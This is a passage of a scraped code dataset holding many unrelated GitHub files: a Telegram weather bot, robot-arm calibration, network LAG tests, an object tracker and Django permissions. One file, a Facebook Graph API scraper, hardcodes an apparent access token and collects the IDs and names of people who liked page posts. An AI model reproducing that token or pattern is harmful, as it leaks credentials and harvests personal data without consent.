\"9\":\n graph_div = graphs.g9(machine, x, y, color, colorset)\n elif GraphType == \"10\":\n graph_div = graphs.g10(machine, x, y, z, color, colorset)\n else:\n graph_div = ''\n\n except Exception as e:\n graph_div = \"\"\"
\n {}\n
\n \"\"\".format(repr(e))\n\n return graph_div\n","repo_name":"vitalfadeev/AI","sub_path":"graph/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32928455324","text":"import requests\nimport pandas as pd \nfrom dateutil.parser import parse\n\n\n#在Facebook Graph API Exploer取得token以及粉絲專頁的ID\n\n\ntoken = 'EAACEdEose0cBABLDyzmSZBstZCNoocfYFkVbcLOC3NPwTJVorioUeG2sZCCNVHl10ZACAKvXDwPo1yaKm70ImHErNz4Rno6RqQi8UWflsUrDKhzhuLZCR7TFhCTJVmVylZAHc3v6YX3ZCYVWevMKnj2jCbVGyMrlZABl70rB1gxZBYvlOlaQkhbl7ZBBoNSafMUr4ZD' \nfanpage_id = '342571109112167'\n\n#建立一個空的list \n\n\ninformation_list = []\n\n\n#目標頁面\n\n\nres = requests.get('https://graph.facebook.com/v2.10/{}/posts?limit=100&access_token={}'.format(fanpage_id, token))\npage = 1 \n\n\n#API最多一次呼叫100筆資料,因此使用while迴圈去翻頁取得所有的文章\n\n\nwhile 'paging' in res.json(): \n for index, information in enumerate(res.json()['data']):\n print('正在爬取第{}頁,第{}篇文章'.format(page, index + 1))\n \n \n #判斷是否為發文,是則開始蒐集按讚ID\n\n\n if 'message' in information:\n res_post = requests.get('https://graph.facebook.com/v2.10/{}/likes?limit=1000&access_token={}'.format(information['id'], token))\n \n \n #判斷按讚人數是否超過1000人,若超過則需要翻頁擷取;當沒有人按讚時,按讚人名與ID皆為NO\n\n try:\n if 'next' not in res_post.json()['paging']:\n for likes in res_post.json()['data']:\n information_list.append([information['id'], information['message'], parse(information['created_time']).date(), likes['id'], likes['name']]) \n elif 'next' in res_post.json()['paging']:\n while 'paging' in res_post.json():\n for likes in res_post.json()['data']:\n information_list.append([information['id'], information['message'], parse(information['created_time']).date(), likes['id'], likes['name']])\n if 'next' in res_post.json()['paging']:\n res_post = requests.get(res_post.json()['paging']['next'])\n else:\n break\n for i in information_list:\n print(i[1])\n except:\n information_list.append([information['id'], information['message'], parse(information['created_time']).date(), \"NO\", \"NO\"])\n\n if 'next' in res.json()['paging']: \n res = requests.get(res.json()['paging']['next'])\n page += 1\n else:\n break\n \nprint('爬取結束!')\n","repo_name":"powersyncmis/python","sub_path":"facebook/facebook.py","file_name":"facebook.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"33709378316","text":"from rest_framework.permissions import BasePermission\n\nfrom account.models import Customer\n\nMETHODES_CREATE_READ = [\"GET\", \"POST\"]\nMETHODES_PUT_DEL = [\"PUT\", \"DELETE\"]\n\n\nclass IsSalerContact(BasePermission):\n message = \"L'utilisateur doit être le référent commercial du client\"\n\n def has_permission(self, request, view): # obj\n if request.user.department == \"seller\":\n if request.method in METHODES_PUT_DEL:\n id_customer = view.kwargs[\"pk\"]\n customer = Customer.objects.get(id=id_customer)\n if customer.seller.id == request.user.id:\n return True\n elif request.method in METHODES_CREATE_READ:\n if not view.kwargs:\n return True\n else:\n id_customer = view.kwargs[\"pk\"]\n customer = Customer.objects.get(id=id_customer)\n if customer.seller.id == request.user.id:\n return True\n else:\n return False\n\n\nclass IsTechnicianEventContact(BasePermission):\n message = \"L'utilisateur doit être le gestionnaire des events du client\"\n\n def has_permission(self, request, view):\n if request.user.department == \"technician\":\n if request.method == \"GET\":\n return True\n else:\n return False\n","repo_name":"seah78/P12","sub_path":"account/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1786516233","text":"from xarm.wrapper import XArmAPI\r\nimport math\r\nimport time\r\nimport requests\r\nimport struct\r\nimport numpy as np\r\nimport csv\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits import mplot3d\r\nimport matplotlib.colors as mcolors\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport matplotlib.lines as mlines\r\nimport pandas as pd\r\n\r\n'''\r\nInitializing the robot arm\r\n'''\r\nrequests.get('http://192.168.1.158:18333/')\r\n\r\narm = XArmAPI(\"192.168.1.158\")\r\narm.motion_enable(enable = True)\r\narm.set_mode(0)\r\narm.set_state(state = 0)\r\n\r\nspeed = 40\r\n\r\ndef calibrate(self):\r\n q = 0\r\n while True:\r\n #rpos is the position that the robot thinks it is (robot position)\r\n #epos is the position that the robot actually is (encoder position) -takes in x,y,z from the encoders\r\n rpos = self.get_position()[1][0:3]\r\n epos = [x, y, z]\r\n \r\n diff = [epos[0] - rpos[0], epos[1] - rpos[1], epos[2] - rpos[2]]\r\n if q == 0:\r\n with open('Robot_Calibration_Datapoints.csv', 'w', newline='') as file:\r\n writer = csv.writer(file)\r\n## writer.writerow(['Measured_X','Measured_Y','Measured_Z', 'Actual_X', 'Actual_Y', 'Actual_Z']) #this line is only run the first time you go through the code so that you have headers in the file\r\n datapoints = rpos + epos\r\n writer.writerow(datapoints)\r\n \r\n \r\n abs_diff = [abs(diff[0]), abs(diff[1]), abs(diff[2])]\r\n \r\n if abs_diff <= [0.5, 0.5, 0.5]:\r\n break\r\n \r\n shift = diff + [0, 0, 0] \r\n self.set_position_aa(shift, speed=speed, relative = True, wait = True)\r\n q += 1\r\n print(f'The system is within 0.5 mm of the actual location, which took ' + q + ' shifts')\r\n\r\ndef plot_calibration():\r\n #Extract the data from the csv file\r\n datapoints = pd.read_csv('Robot_Calibration_Datapoints.csv')\r\n system_measured_points = np.transpose(np.array([datapoints.Measured_X, datapoints.Measured_Y, datapoints.Measured_Z]))\r\n actual_points = np.transpose(np.array([datapoints.Actual_X, datapoints.Actual_Y, datapoints.Actual_Z]))\r\n print(system_measured_points)\r\n print(actual_points)\r\n \r\n # Calculate the difference between system-measured points and actual points\r\n difference = system_measured_points - actual_points\r\n print(difference)\r\n normalized_difference = difference / np.linalg.norm(difference, axis=1, keepdims=True) # Normalize differences\r\n\r\n # Create a 3D plot\r\n fig1 = plt.figure(1)\r\n ax = fig1.add_subplot(111, projection='3d')\r\n\r\n # Set the line colors based on the difference in coordinates\r\n for i in range(len(difference)):\r\n if np.all(difference[i] < 0):\r\n line_color = 'blue' # All negative differences\r\n elif np.all(difference[i] > 0):\r\n line_color = 'red' # All positive differences\r\n elif (difference[i, 0] < 0 and difference[i, 1] < 0) or (difference[i, 1] < 0 and difference[i, 2] < 0) or (difference[i, 0] < 0 and difference[i, 2] < 0):\r\n line_color = 'rebeccapurple'\r\n else:\r\n line_color = 'mediumvioletred' # Mixed differences\r\n ax.plot([actual_points[i, 0], system_measured_points[i, 0]],\r\n [actual_points[i, 1], system_measured_points[i, 1]],\r\n [actual_points[i, 2], system_measured_points[i, 2]], c=line_color)\r\n\r\n # Add labels and legend\r\n ax.set_xlabel('X')\r\n ax.set_ylabel('Y')\r\n ax.set_zlabel('Z')\r\n\r\n # Set up a legend for the line colors\r\n legend_lines = [mlines.Line2D([], [], color = 'blue', label = 'Negative Difference', linewidth = 2),\r\n mlines.Line2D([], [], color = 'red', label = 'Positive Difference', linewidth = 2),\r\n mlines.Line2D([], [], color = 'rebeccapurple', label = 'Seminegative Difference', linewidth = 2),\r\n mlines.Line2D([], [], color = 'mediumvioletred', label = 'Semipositive Difference', linewidth = 2)]\r\n # Add the custom lines to the legend\r\n ax.legend(handles = legend_lines, loc = 'upper center', bbox_to_anchor = (0.9, 1.15))\r\n\r\n line = [None, None, None]\r\n for i in range(3):\r\n if max(actual_points[:,i]) > max(system_measured_points[:,i]):\r\n line[i] = np.linspace(0, max(actual_points[:,i]))\r\n else:\r\n line[i] = np.linspace(0, max(system_measured_points[:,i]))\r\n \r\n # Create a figure and three subplots\r\n fig2, (ax1, ax2, ax3) = plt.subplots(3, 1, figsize = (7, 7))\r\n\r\n # Plot data on each subplot\r\n ax1.scatter(actual_points[:, 0], system_measured_points[:, 0], label = 'X Differences', color = 'blue')\r\n ax1.plot(line[0], line[0], color = 'blue', linewidth = 0.5)\r\n ax2.scatter(actual_points[:, 1], system_measured_points[:, 1], label = 'Y Differences', color = 'green')\r\n ax2.plot(line[1], line[1], color = 'green', linewidth = 0.5)\r\n ax3.scatter(actual_points[:, 2], system_measured_points[:, 2], label = 'Z Differences', color = 'red')\r\n ax3.plot(line[2], line[2], color = 'red', linewidth = 0.5)\r\n\r\n # Set titles and labels for each subplot\r\n ax1.set_xlabel('Actual X')\r\n ax1.set_ylabel('Measured X')\r\n ax1.legend()\r\n\r\n ax2.set_xlabel('Actual Y')\r\n ax2.set_ylabel('Measured Y')\r\n ax2.legend()\r\n\r\n ax3.set_xlabel('Actual Z')\r\n ax3.set_ylabel('Measured Z')\r\n ax3.legend()\r\n\r\n # Adjust spacing between subplots\r\n plt.tight_layout()\r\n\r\n # Show the plot\r\n plt.show()\r\n \r\ncalibrate(arm)\r\nplot_calibration()\r\n\r\n\r\n\r\n \r\n","repo_name":"williamsikkema/Vitacore","sub_path":"Rebecca/Calibration.py","file_name":"Calibration.py","file_ext":"py","file_size_in_byte":5546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"10606560801","text":"from setuptools import setup\n\nwith open(\"README.md\") as file:\n read_me = file.read()\n\nwith open(\"requirements.txt\") as file:\n requires = file.read().split('\\n')\n\nsetup(\n name=\"kerio\",\n version=\"0.1\",\n author=\"birdiecode\",\n author_email=\"birdiecode@protonmail.com\",\n license='GPLv3',\n description=\"API для взаимодейтвия с продуктами Kerio Technologies.\",\n long_description=read_me,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/birdiecode/kerio-python-api\",\n packages=['kerio'],\n python_requires='>=3.5',\n install_requires=requires\n)\n","repo_name":"birdiecode/kerio-python-api","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30377200148","text":"from typing import List\n\n\ndef solution(nums: List[list]) -> List[List[int]]:\n results = []\n prev_elements = []\n\n def dfs(elements):\n # 리프 노드면 결과를 추가하기.\n if len(elements) == 0:\n # 현재까지의 값에 대한 참조값을 results에 넣음으로서\n # 모든 갯수를 카운트한다 할 수 있겠다.\n results.append(prev_elements[:])\n\n # 순열 생성에 대한 재귀호출\n for e in elements:\n next_elements = elements[:]\n next_elements.remove(e)\n\n prev_elements.append(e)\n dfs(next_elements)\n prev_elements.pop()\n\n dfs(nums)\n return results\n\n\ntest1 = [1, 2, 3]\n\nsolution(test1)\n","repo_name":"s3ich4n/coding_interview_self_taught","sub_path":"codes/pt4/12_graph/q34/01_premutations.py","file_name":"01_premutations.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"5807388439","text":"import sys\nfrom PyQt5.QtWidgets import QApplication\nfrom View.MainWindowEPS import MainWindowEPS\n\n\n\nclass App:\n\n def main(self):\n app = QApplication(sys.argv) # iniciar sistema gráfico\n window_client = MainWindowEPS() # crear objeto de la ventana\n window_client.open_file()\n # window_client.init_window()\n window_client.show() # mostrar ventana\n\n # window_eps = MainWindowEPS()\n # window_eps.open_file()\n # window_eps.init_window()\n # window_eps.show() # mostrar ventana\n\n app.exec_() # saliendo del sistema\n\n\napp = App()\napp.main()\n","repo_name":"sarmero/my-project-phyton","sub_path":"ProgramClainsSuggetions/ProjectClainsSuggetionsEPS/App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"18234911285","text":"import cv2\nimport numpy as np\nfrom siamfc import TrackerSiamFC\n\ndef rectangleImg(img,startPt,stopPt,color=(0,0,255),thickness=2):\n return cv2.rectangle(img, startPt, stopPt, color=color, thickness=thickness) \n\ndef cameraTracking():\n net_path = 'siamfc_alexnet_e554.pth'\n tracker = TrackerSiamFC(net_path=net_path)\n\n cap = cv2.VideoCapture(0) #set tracking target boundingbox, press enter\n ret, first_frame = cap.read()\n cv2.imshow('first_frame',first_frame)\n bbi = cv2.selectROI('first_frame',first_frame)\n cv2.destroyAllWindows() \n print('The object you select:', bbi)\n \n tracker.init(first_frame, bbi)\n \n while(True):\n ret, frame = cap.read()\n \n box = tracker.update(frame)\n #print('box=',box)\n \n pt1 = (int(box[0]), int(box[1]))\n pt2 = (int(box[0] + box[2]), int(box[1]+box[3]))\n show = rectangleImg(frame, pt1, pt2)\n\n # Display the resulting frame\n cv2.imshow('frame',show)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n cap.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n cameraTracking()\n","repo_name":"StevenHuang2020/SiameseFc_PyTorch","sub_path":"src/videoCapTracking.py","file_name":"videoCapTracking.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"20924082848","text":"import re\r\nimport logging\r\nfrom loader import dp, db\r\nfrom aiogram import types\r\nfrom datetime import datetime\r\n\r\nfrom aiogram.dispatcher import FSMContext\r\n\r\nfrom states.edit_weather_time import StateWeatherTime\r\nfrom keyboards.inline.yes_no import yes_no\r\n\r\n\r\n@dp.message_handler(commands=['setting_weather_time'])\r\nasync def edit_weather_time(message: types.Message):\r\n # User chat id\r\n user_id = message.chat.id\r\n # Taking the weather time value from database\r\n current_weather_time = await db.select_weather_time(chat_id=user_id)\r\n # Parsing time format time(00:00:00) to str(00:00)\r\n just_time = str(current_weather_time['weather_time'])[:5]\r\n # Text\r\n text = (f\"👋 Today is {datetime.now().strftime('%A')}\\n\",\r\n \"🌦 What time of day do you need weather information? \",\r\n \"if you want to receive news, follow \",\r\n \"write it down in the form and do it every day \",\r\n \"we will send you an update in time.\\n\",\r\n \"🕔 Time Format:\",\r\n \"09:00 - nine in the morning\",\r\n \"12:00 - Lunch Time\",\r\n \"21:00 - Nine in the evening\",\r\n \"00:00 - Midnight\\n\",\r\n f\"🕔 Weather updates come daily at {just_time}\",)\r\n text = '\\n'.join(text)\r\n # Send Message\r\n await message.reply(text=text)\r\n\r\n # Statement\r\n await StateWeatherTime.weather_time.set()\r\n\r\n\r\nasync def check_time(message, state):\r\n # Regex Pattern\r\n pattern = r'^(?:[01]\\d|2[0-3]):[0-5]\\d$'\r\n # User chat id\r\n user_id = message.chat.id\r\n # Taking the weather time value from database\r\n current_weather_time = await db.select_weather_time(chat_id=user_id)\r\n # Parsing time format time(00:00:00) to str(00:00)\r\n just_time = str(current_weather_time['weather_time'])[:5]\r\n # Checking time by the regular Expression (Regex)\r\n if re.match(pattern, message.text):\r\n # Saving time value to FSMContext\r\n async with state.proxy() as data:\r\n data['time'] = message.text\r\n # Text\r\n text = (f'👋 Today is {datetime.now().strftime(\"%A\")}',\r\n f'🕔 Weather updates come daily at {just_time}. But\\n',\r\n f'🌦 Would you like to receive daily weather updates at {message.text} ?',)\r\n text = '\\n'.join(text)\r\n # This is inline button `yes` and `no` for confirm time\r\n inline_keyboard = yes_no()\r\n # Send Message\r\n await message.reply(text=text, reply_markup=inline_keyboard)\r\n # Statement\r\n await StateWeatherTime.confirm.set()\r\n else:\r\n # Text\r\n text = (f\"❌ I didn`t get it: \\n\",\r\n f\"🤖 Commands:\",\r\n f\"/start - Start the bot\",\r\n f\"/help - Help\",\r\n f\"/setting_weather_time - Setting the weather time\",\r\n f\"/current_weather - Current weather data\",\r\n f\"🤔 If you want to change the WEATHER time, resend the correct time.\\n\",\r\n f\"🕔 Weather updates come daily at {just_time}\")\r\n text = '\\n'.join(text)\r\n # Send Message\r\n await message.reply(text=text)\r\n # Statement finish\r\n await state.finish()\r\n\r\n\r\n@dp.message_handler(state=StateWeatherTime.weather_time)\r\nasync def regex_time(message: types.Message, state: FSMContext):\r\n # Statement\r\n # checking the time format from (00:00) to (23:59)\r\n await check_time(message, state)\r\n\r\n\r\n@dp.message_handler(state=None)\r\nasync def bot_echo(message: types.Message, state: FSMContext):\r\n # No Statement\r\n # Checking the time format from (00:00) to (23:59)\r\n await check_time(message, state)\r\n\r\n\r\n@dp.callback_query_handler(text=['yes', 'no'], state=StateWeatherTime.confirm)\r\nasync def confirm_time(call: types.CallbackQuery, state: FSMContext):\r\n # Callback_data\r\n conf_data = call.data\r\n # User chat id\r\n user_id = call.message.chat.id\r\n # take time from database by user_id field\r\n current_weather_time = await db.select_weather_time(chat_id=user_id)\r\n # time format from (00:00:00) to (00:00)\r\n just_time = str(current_weather_time['weather_time'])[:5]\r\n # saving time value in FSMContext\r\n async with state.proxy() as data:\r\n text_time = data['time']\r\n\r\n if conf_data == 'yes':\r\n # Parsing from str(time) to datetime(time) and saving to database\r\n await db.update_weather_time(time=datetime.strptime(text_time, '%H:%M').time(), user_id=user_id)\r\n # Text\r\n alert_text = f\"🕔 {text_time} saved!\"\r\n # Send Alert Message\r\n await call.answer(text=alert_text, cache_time=60000)\r\n # Text\r\n message_text = f'🕔 {text_time} saved!'\r\n # Send Message\r\n await call.message.answer(text=message_text)\r\n\r\n elif conf_data == 'no':\r\n # Text\r\n alert_text = f\"⚠️ {text_time} not save\"\r\n # Send Alert Message\r\n await call.answer(text=alert_text, cache_time=60000)\r\n # Text\r\n message_text = f'⚠️ {text_time} didn`t save!'\r\n # Send Message\r\n await call.message.answer(text=message_text)\r\n # Text\r\n answer_text = (f\"👋 Today is {datetime.now().strftime('%A')}\",\r\n f\"🕔 Weather updates come daily at {just_time}\")\r\n answer_text = '\\n'.join(answer_text)\r\n # Send Message\r\n await call.message.answer(text=answer_text)\r\n # Statement finish\r\n await state.finish()\r\n","repo_name":"AsadbekSolijonov/DemoNews","sub_path":"handlers/users/edit_weather_time.py","file_name":"edit_weather_time.py","file_ext":"py","file_size_in_byte":5452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"8396085644","text":"from script import *\nimport unittest\nfrom io import StringIO\nimport sys\n\ntest_block1 = Block(0, 36, 286, 67, -27, 20.83, 0, 0)\ntest_block2 = Block(1, 37, 286, 67, -117, 83.33, 0, 0)\njson_test = {\n\t\t\t\t\t\"_id\": 0,\n\t\t\t\t\t \"x\": 36, \"y\": 286,\n\t\t\t\t\t \"z\": 67, \"block_value\": -27, \n\t\t\t\t\t \"ton\": 20.83, \"destination\": 0, \n\t\t\t\t\t \"au\": 0\n\t\t\t\t} \n\n\nclass TestBlocks(unittest.TestCase):\n\n def test_to_json(self):\n self.assertEqual(test_block1.to_json(),json_test )\n\n def test_save_in_database(self):\n test_block1.save_in_database()\n block = blocks.find_one({\"_id\":test_block1._id})\n self.assertTrue(block)\n\n def test_print_block(self):\n output = StringIO() \n sys.stdout = output \n test_block1.print_block() \n sys.stdout = sys.__stdout__ \n self.assertEqual(output.getvalue(), \"{'_id': 0, 'x': 36, 'y': 286, 'z': 67, 'block_value': -27, 'ton': 20.83, 'destination': 0, 'au': 0}\\n\" )\n\n \n\nif __name__ == \"__main__\":\n unittest.main()\n ","repo_name":"TGRaydas/SoftwareDesign_Project_1","sub_path":"test_script.py","file_name":"test_script.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13531411399","text":"# funBaConf.py\n\n# $language = \"python\"\n# $interface = \"1.0\"\n\nfrom logging import root\nimport sys\nimport time\nimport os\nimport basic.basicConf as bc\nimport mef.mefConf as mc\nimport lag.lagVef as lav\n\n\ndef disSubTitle(child,Title):\n child.send_command(Title )\n\n\ndef staticLag(child,lagin):\n config_set = [\n f'interface {lagin[0]}', \n 'channel-group 1 mode on working',\n f'interface {lagin[1]}',\n 'channel-group 1 mode on protection'\n ]\n child.send_config_set(config_set)\n\ndef activeLacp(child,lagin):\n config_set = [\n f'interface {lagin[0]}', \n 'channel-group 1 mode active',\n 'lacp timeout short',\n f'interface {lagin[1]}',\n 'channel-group 1 mode active',\n 'lacp timeout short'\n ]\n child.send_config_set(config_set)\n\ndef passiveLacp(child,lagin):\n config_set = [\n f'interface {lagin[0]}', \n 'channel-group 1 mode passive',\n 'lacp timeout short',\n f'interface {lagin[1]}',\n 'channel-group 1 mode passive',\n 'lacp timeout short'\n ]\n child.send_config_set(config_set)\n\ndef changeMaxMember(child,maxmember):\n child.send_config_set(f'port-channel 1 max-member {maxmember}')\n\ndef delNniInt(child):\n config_set = ['ethernet nni nni1', 'no map interface']\n child.send_config_set(config_set) \n\ndef addNniInt(child):\n config_set = ['ethernet nni nni1', 'map interface po1']\n child.send_config_set(config_set) \n\ndef delPortCh(child,lagin): \n config_set = [f'interface range {lagin[0]}-{lagin[1]}', 'no channel-group']\n child.send_config_set(config_set)\n\ndef deflacpTime(child,lagin): \n config_set = [f'interface range {lagin[0]}-{lagin[1]}', 'lacp timeout long']\n child.send_config_set(config_set)\n\ndef noshutLagInt(child,lagin): \n config_set = [f'interface range {lagin[0]}-{lagin[1]}', 'no shutdown']\n # config_set = ['interface po1', 'no shutdown']\n child.send_config_set(config_set)\n\ndef shutLagInt(child,lagin): \n config_set = [f'interface range {lagin[0]}-{lagin[1]}', 'shutdown']\n # config_set = ['interface po1', 'shutdown']\n child.send_config_set(config_set)\n\n###################################################################################\n\n### Static Link Aggregation ###\t \ndef confLag(host,lagin):\n with bc.connect(host) as child:\n time.sleep(1)\n delNniInt(child)\n time.sleep(1)\n staticLag(child,lagin)\n time.sleep(1)\n addNniInt(child)\n time.sleep(1)\n noshutLagInt(child,lagin)\n time.sleep(1)\n\n### Static Link Aggregation ###\t \ndef confLacp(host,lagin):\n with bc.connect(host) as child:\n time.sleep(1)\n delNniInt(child)\n time.sleep(1)\n activeLacp(child,lagin)\n time.sleep(1)\n addNniInt(child)\n time.sleep(1)\n noshutLagInt(child,lagin)\n time.sleep(5)\n\n### Pure Static Link Aggregation ###\t \ndef removeLag(host,lagin):\n with bc.connect(host) as child:\n shutLagInt(child,lagin)\n time.sleep(1)\n delNniInt(child)\n time.sleep(1)\n delPortCh(child,lagin)\n time.sleep(1) \n\n\n### Pure Static Link Aggregation ###\t \ndef removeLacp(host,lagin):\n with bc.connect(host) as child:\n svc = 1\n uni = 1\n shutLagInt(child,lagin)\n time.sleep(1)\n delNniInt(child)\n time.sleep(1)\n deflacpTime(child,lagin)\n time.sleep(1)\n delPortCh(child,lagin)\n time.sleep(1) \n mc.dltServi(host,svc,uni)\n time.sleep(1)\n\n### Redundant Static Link Aggregation ###\t \n\ndef confStaticLag(host,lagin):\n result = []\n confLag(host,lagin)\n print('#' * 3 + ' check static channel-group ' + '#' * 3)\n result.append(lav.checkPortChannel(host,'static',lagin))\n time.sleep(1)\n print('#' * 3 + ' check BCM Port state ' + '#' * 3)\n result.append(lav.checkBcmPort(host,'hotstandby'))\n print(result)\n return result.count('Ok')\n\ndef confBasicLacp(host,lagin): \n with bc.connect(host) as child: \n result = []\n confLacp(host,lagin)\n time.sleep(10)\n print('#' * 3 + ' check lacp active Mode ' + '#' * 3)\n result.append(lav.checkPortChannel(host,'lacp',lagin))\n result.append(lav.checkLacpInternal(host,'active')) \n time.sleep(1)\n delNniInt(child)\n time.sleep(1)\n passiveLacp(child,lagin)\n time.sleep(1) \n addNniInt(child)\n time.sleep(5)\n print('#' * 3 + ' check lacp passive Mode ' + '#' * 3) \n result.append(lav.checkPortChannel(host,'lacp',lagin))\n result.append(lav.checkLacpInternal(host,'passive'))\n time.sleep(1)\n changeMaxMember(child,1)\n time.sleep(5)\n print('#' * 3 + ' check lacp MaxMember 1 ' + '#' * 3) \n result.append(lav.checkPortChannel(host,'hotstandby',lagin))\n result.append(lav.checkLacpInternal(host,'hotstandby'))\n time.sleep(1)\n print('#' * 3 + ' check BCM Port state ' + '#' * 3) \n result.append(lav.checkBcmPort(host,'hotstandby'))\n changeMaxMember(child,8)\n time.sleep(5)\n print('#' * 3 + ' check lacp MaxMember 8 ' + '#' * 3) \n result.append(lav.checkPortChannel(host,'lacp',lagin))\n result.append(lav.checkLacpInternal(host,'passive'))\n time.sleep(1) \n result.append(lav.checkBcmPort(host,'normal'))\n time.sleep(1)\n removeLacp(host,lagin) \n print(result) \n return result.count('Ok')\n\n","repo_name":"jaehun-jang/Pytest","sub_path":"lag/lagConf.py","file_name":"lagConf.py","file_ext":"py","file_size_in_byte":5700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24714494512","text":"import json\nfrom unique.mockdata import MockData\nimport os\n\nmocker = MockData()\nDATA_PATH = os.path.abspath(\".\") + \"\\data\\data.json\"\n\n\nclass DataType:\n NUM = \"num\"\n ARRAY = \"array\"\n PHONE = \"phone\"\n EMAIL = \"email\"\n\n\n# 设置数字唯一值并返回,设置phone 或 email\ndef setValue(varName, dataType=DataType.NUM, value=1, path=DATA_PATH):\n '''dataType: num、array'''\n with open(path, \"r\") as f:\n data = json.load(f)\n if varName in data.keys():\n if dataType == \"num\":\n data[varName] += value\n elif dataType == \"array\":\n data[varName].append(value)\n else:\n raise NameError(\"The '{}'dataType is not existed\".format(dataType))\n else:\n if dataType == \"num\":\n data[varName] = 1\n elif dataType == \"array\":\n data[varName] = [value]\n else:\n raise NameError(\"The '{}'dataType is not existed\".format(dataType))\n\n with open(path, \"w\") as write:\n json.dump(data, write, indent=4)\n\n return data[varName]\n\n\n# 取数字,or 取phone、email的唯一值\ndef getValue(varName, dataType=DataType.NUM, path=DATA_PATH):\n '''dataType: num、phone、email'''\n with open(path, \"r\") as f:\n data = json.load(f)\n if dataType == \"num\":\n return data[varName]\n elif dataType == \"phone\":\n try:\n phones = data[varName]\n except KeyError as e:\n phones = []\n phone = mocker.getPhone()\n while phone in phones:\n phone = mocker.getPhone()\n return setValue(varName, \"array\", phone)\n elif dataType == \"email\":\n try:\n emails = data[varName]\n except:\n emails = []\n email = mocker.getEmailAddr()\n while email in emails:\n email = mocker.getEmailAddr()\n return setValue(varName, \"array\", email)\n else:\n raise NameError(\"The '{}'dataType is not existed\".format(dataType))\n\n\nif __name__ == '__main__':\n setValue(\"test\")\n","repo_name":"jing17/qatools","sub_path":"unique/uniqueValue.py","file_name":"uniqueValue.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"31136700122","text":"import cv2\r\nimport numpy as np\r\nimport imutils\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# def disp_frame(name, src):\r\n# # function to display frames so they fit my laptop screen\r\n# re_frame = cv2.resize(src, (1360, 780)) # Resize image to laptop dimensions\r\n# cv2.imshow(name, re_frame)\r\n# cv2.waitKey(0)\r\n\r\n\r\ndef list_pixels(mask):\r\n pixels = list()\r\n for i in range(mask.shape[0]):\r\n for j in range(mask.shape[1]):\r\n if np.all(mask[i, j]):\r\n pass\r\n else:\r\n pixels.append([i, j]) # else append to PIO list\r\n return pixels\r\n\r\n\r\n# def gen_hist(frame, pixels):\r\n# frame_grey = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)\r\n# # init contour mask for locate func here to reduce total loop counts\r\n# mask = np.zeros((frame.shape[0], frame.shape[1]), np.uint8)\r\n# intents = list()\r\n# for i in range(len(pixels)):\r\n# ref = pixels[i]\r\n# intent = frame_grey[ref[0], ref[1]]\r\n# intents.append(intent)\r\n# if intent > 245: # set pixel intensity sensitivity for mask here\r\n# mask[ref[0], ref[1]] = 1\r\n# frame_binary = cv2.bitwise_and(frame, frame, mask=mask) # binop w mask to create binary frame for locate func\r\n# # plt.hist(intents, 255)\r\n# # plt.show()\r\n# return intents, frame_binary\r\n\r\n\r\ndef rect_ratio(contour, frame_binary):\r\n x, y, w, h = cv2.boundingRect(contour)\r\n bubble_pixels = 0\r\n for i in range(w):\r\n for j in range(h):\r\n if np.all(frame_binary[y + j, x + i][0]):\r\n bubble_pixels += 1\r\n ratio = bubble_pixels/(w * h)\r\n return ratio\r\n\r\n\r\ndef locate(frame, pixels):\r\n frame_grey = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)\r\n # init contour mask for locate func here to reduce total loop counts\r\n mask = np.zeros((frame.shape[0], frame.shape[1]), np.uint8)\r\n intents = list()\r\n for i in range(len(pixels)):\r\n ref = pixels[i]\r\n intent = frame_grey[ref[0], ref[1]]\r\n intents.append(intent)\r\n if intent > 245: # set pixel intensity sensitivity for mask here\r\n mask[ref[0], ref[1]] = 1\r\n frame_binary = cv2.bitwise_and(frame, frame, mask=mask) # binop w mask to create binary frame for locate func\r\n # plt.hist(intents, 255)\r\n # plt.show()\r\n\r\n #################################################\r\n # dont really understand eveything above... go over it to make sure it is actually needed\r\n # look into moving creating a hist into extract\r\n #################################################\r\n\r\n frame_final = frame.copy()\r\n grey_bin_frame = cv2.cvtColor(frame_binary, cv2.COLOR_BGR2GRAY)\r\n\r\n # find contours in the edge map\r\n contours = cv2.findContours(grey_bin_frame, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\r\n contours = contours[0] if imutils.is_cv2() else contours[1]\r\n\r\n centres = list()\r\n for i in range(len(contours)):\r\n if cv2.contourArea(contours[i]) > 15: # set contour area condition\r\n rect = cv2.minAreaRect(contours[i])\r\n box = cv2.boxPoints(rect)\r\n box = 